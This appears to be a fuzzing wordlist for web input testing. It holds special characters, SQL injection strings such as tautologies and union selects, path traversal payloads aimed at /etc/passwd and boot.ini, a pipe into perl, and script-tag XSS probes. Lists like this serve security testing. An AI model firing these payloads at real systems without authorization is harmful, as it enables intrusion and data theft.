-1
1+1
2
0
1
a
!@#$%^*()-_
'"`#;--
\
\\
\\\
/
//
///
a&param[]=b
|perl
|a
]a
[a
{a
}a
)a
(a
~
`
!
@
#
$
%
^
&
*
_
+
=
?
¿
€
,
.
%27
%22
'
"
1'1
1"1
1'1 --;
1"1 --;
1 and 1=1
1 or 1=1
1 and 1=1 --;
1 or 1=1 --;
1' or '1'='1
1" or "1"="1
1' or '1'='1' --;
1" or "1"="1" --;
a' union all select null --;
a" union all select null --;
/etc/passwd
../../../../../../../../../etc/passwd%00
/../../../../../../../../../etc/passwd%00
../../../../../../../../../boot.ini%00
/../../../../../../../../../boot.ini%00
"><script>alert(1);</script>
'><script>alert(1);</script>
